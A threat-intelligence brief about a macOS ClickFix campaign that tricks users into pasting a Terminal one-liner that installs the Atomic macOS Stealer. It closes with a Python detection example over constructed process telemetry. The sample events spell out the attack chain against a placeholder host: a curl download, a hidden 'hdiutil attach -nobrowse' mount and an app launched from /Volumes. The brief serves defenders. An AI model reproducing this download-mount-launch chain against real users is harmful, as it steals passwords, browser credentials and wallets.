ctipilot.ch

macOS ClickFix evolves: `hdiutil attach -nobrowse` mounts the malicious DMG invisibly before dropping AMOS `[SINGLE-SOURCE]`

From CTI Daily Brief — 2026-06-24 · published 2026-06-24

A new macOS ClickFix variant (Palo Alto Unit 42, via BleepingComputer 2026-06-23) drops the visible-DMG step: the fake-CAPTCHA Terminal lure now has the user paste a one-liner that fetches the disk image with `curl` and mounts it with `hdiutil attach -nobrowse`, so the volume never appears in Finder or on the desktop, then launches a self-signed app from the mount via `open` (BleepingComputer, 2026-06-23).

The payload is Atomic macOS Stealer (AMOS): it presents a fake System Preferences authentication prompt to capture the local password, then steals browser credentials across numerous Chromium- and Firefox-derived browsers, cryptocurrency-wallet data, and Keychain contents.

[SINGLE-SOURCE] — BleepingComputer attributes the finding to Unit 42, but a separate primary Unit 42 article for this specific technique was not located this run (see § 7).

Detection on macOS: `hdiutil attach -nobrowse` invoked by a shell parented by Terminal; Terminal executing pasted commands that reference external download URLs; apps launched from `/Volumes/` mounts; user awareness that legitimate CAPTCHAs never require Terminal input (T1204.001, T1105, T1555).
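The three process-level signals above, encoded as a detection pass over constructed process-start telemetry. This is an added example, not code from the brief or from Unit 42's or BleepingComputer's reporting; the event format, the sample command lines (placeholder `.invalid` host) and the rule-to-technique mapping are assumptions.

```python
import shlex

SHELLS = {"bash", "zsh", "sh"}

# Constructed sample process-start events (not real logs), shaped like EDR telemetry.
# pids 100-104: the ClickFix chain. pids 200-202: a benign admin mounting an image visibly.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "Terminal", "cmdline": "Terminal"},
    {"pid": 101, "ppid": 100, "image": "zsh",      "cmdline": "-zsh"},
    {"pid": 102, "ppid": 101, "image": "curl",     "cmdline": "curl -fsSL https://lure.invalid/Installer.dmg -o /tmp/i.dmg"},
    {"pid": 103, "ppid": 101, "image": "hdiutil",  "cmdline": "hdiutil attach -nobrowse /tmp/i.dmg"},
    {"pid": 104, "ppid": 101, "image": "open",     "cmdline": "open /Volumes/Installer/Installer.app"},
    {"pid": 200, "ppid": 1,   "image": "Terminal", "cmdline": "Terminal"},
    {"pid": 201, "ppid": 200, "image": "zsh",      "cmdline": "-zsh"},
    {"pid": 202, "ppid": 201, "image": "hdiutil",  "cmdline": "hdiutil attach /Users/me/Downloads/tool.dmg"},
]

def ancestry(events, pid):
    """Return the ancestor image names of `pid`, nearest parent first."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur and cur["ppid"] in by_pid:
        cur = by_pid[cur["ppid"]]
        chain.append(cur["image"])
    return chain

def detect(events):
    """Apply the brief's three heuristics; return (rule, technique, pid) hits.
    Technique IDs are the ones the brief lists; the per-rule assignment is an assumption."""
    hits = []
    for e in events:
        argv = shlex.split(e["cmdline"])
        parents = ancestry(events, e["pid"])
        if "Terminal" not in parents:
            continue  # every rule here requires Terminal-descended execution
        from_shell = bool(parents) and parents[0] in SHELLS
        if e["image"] == "hdiutil" and from_shell and "attach" in argv and "-nobrowse" in argv:
            hits.append(("hdiutil_nobrowse_from_terminal_shell", "T1204.001", e["pid"]))
        elif e["image"] == "curl" and any(a.startswith(("http://", "https://")) for a in argv):
            hits.append(("terminal_download_external_url", "T1105", e["pid"]))
        elif e["image"] == "open" and any(a.startswith("/Volumes/") and a.endswith(".app") for a in argv[1:]):
            hits.append(("app_launched_from_volumes_mount", "T1204.001", e["pid"]))
    return hits

if __name__ == "__main__":
    for rule, technique, pid in detect(EVENTS):
        print(f"{technique} {rule} pid={pid}")
```

The benign `hdiutil attach` without `-nobrowse` (pid 202) produces no hit, which is the discriminator the brief relies on; a download from Terminal alone (rule 2) is a weaker signal and is best used for correlation rather than alerting on its own.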